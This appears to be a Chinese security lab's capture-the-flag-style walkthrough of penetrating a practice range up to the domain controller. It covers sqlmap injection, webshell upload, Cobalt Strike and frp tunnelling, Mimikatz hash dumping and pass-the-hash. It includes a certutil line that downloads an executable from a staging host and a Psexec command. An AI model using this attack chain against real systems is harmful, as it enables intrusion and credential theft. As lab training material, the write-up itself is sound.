破军安全实验室
本文约1500字,阅读约需5分钟。
0x00 环境准备
网络拓扑图如下
外网Web
172.16.10.*/192.168.140.140(Linux)内网Web
192.168.140.142192.168.140.141192.168.140.143/192.168.142.113
DC
10.10.10.10user
192.168.142.1120x01 打点
工具指南
dismap下载地址:
https://github.com/zhzyker/dismap
确定ip地址172.16.30.17是目标靶场
开始爆破目录
已爆破目录
robots.txtindex.html
/m3diNf0/se3reTdir777/uploads
访问了/se3reTdir777/uploads但是是禁止访问的
于是访问了上一级目录
在输入处尝试sql注入
现在我们想执行os-shell还要知道网站的绝对路径,我们可以对/m3diNf0目录再次进行爆破
在SCRIPT_FILENAME处找到网站的绝对路径
sqlmap填路径的时候一定要用
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/因为其他路径没有权限
用sqlmap上传功能的界面上传一个新的木马
上传冰蝎马
0x02 代理&& CS
用Cross C2上线Linux主机
frp代理打通sosks5的隧道后用proxifier挂代理
访问192.168.140.141,确认挂上代理
因为phpstudy代码执行在header里,所以我们直接用蚁剑去链接,配置如下
让192.168.140.141上线用goproxy端口转发出来
CobaltStrike设置
把生成的木马上传到192.168.140.141上执行
CobaltStrike成功上线
到这一步我们该横向了,因为DC在192.168.140.143上,用Mimikatz读到了NTLM
0x03 PTH哈希传递
Psexec来NTLM传递
因为192.168.140.143可以连接192.168.140.140,所以可以直接执行木马
certutil命令下载
certutil.exe -urlcache -split -f http://192.168.140.140/se3reTdir777/uploads/hm2.exehm2.exe
把192.168.140.140设置成frps端
CobaltStrike执行frpc端
由于ms17-010有些问题,我们直接用了PTH
用SMB Beacon上线192.168.142.112,SMB Beacon生成,生成木马必须用windows Executable(s)
Psexec [email protected] -hashsxxxxxxxxxxxxxxxxxxxxxxxx -c beacon
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,破军安全实验室及文章作者不为此承担任何责任。
破军安全实验室拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经破军安全实验室允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
破军安全实验室
# 长按二维码 关注我们 #
原文始发于微信公众号(破军安全实验室):记一次靶场渗透测试到拿下域控的实战演练
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论